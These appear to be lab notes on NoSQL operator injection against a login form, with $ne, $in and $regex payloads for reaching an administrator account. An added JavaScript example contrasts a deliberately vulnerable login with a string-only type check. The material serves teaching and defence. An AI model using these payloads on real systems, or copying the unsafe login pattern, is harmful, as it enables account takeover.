2 - Exploiting NoSQL operator injection to bypass authentication

{"username":"administrator","password":{"$ne" :"peter"}}
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}

Switch to form-urlencoded and try with [$ne].

{"$regex":"wien.*"}
{"$regex":"admin.*"}
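
Why the payloads above match, and the type check that rejects them, as an added example that is not part of the original notes. `matches` is a minimal stand-in for MongoDB's query matching (only $ne, $in and $regex); the user records, function names and plaintext passwords are constructed for illustration.

```javascript
// Constructed sample data; all names here are hypothetical.
const users = [
  { username: "wiener", password: "peter" },
  { username: "administrator", password: "s3cret-constructed" },
];

// Minimal stand-in for how MongoDB matches one field against a query value.
// Covers only the operators used in the notes: $ne, $in, $regex.
function matches(value, cond) {
  if (cond === null || typeof cond !== "object") return value === cond;
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case "$ne": return value !== arg;
      case "$in": return Array.isArray(arg) && arg.includes(value);
      case "$regex": return new RegExp(arg).test(value);
      default: throw new Error("unsupported operator " + op);
    }
  });
}

function findOne(query) {
  const hit = users.find(u =>
    Object.entries(query).every(([field, cond]) => matches(u[field], cond)));
  return hit || null;
}

// Vulnerable: the parsed request body goes into the query untouched, so an
// object such as {"$ne":"peter"} is evaluated as an operator, not compared as a value.
function loginUnsafe(body) {
  return findOne({ username: body.username, password: body.password });
}

// Hardened: accept plain strings only, so operator objects never reach the query.
function loginSafe(body) {
  const { username, password } = body ?? {};
  if (typeof username !== "string" || typeof password !== "string") return null;
  return findOne({ username, password });
}
```

The same string-only check covers form-urlencoded bodies when the parser expands bracket keys into nested objects, because the value still arrives as an object rather than a string.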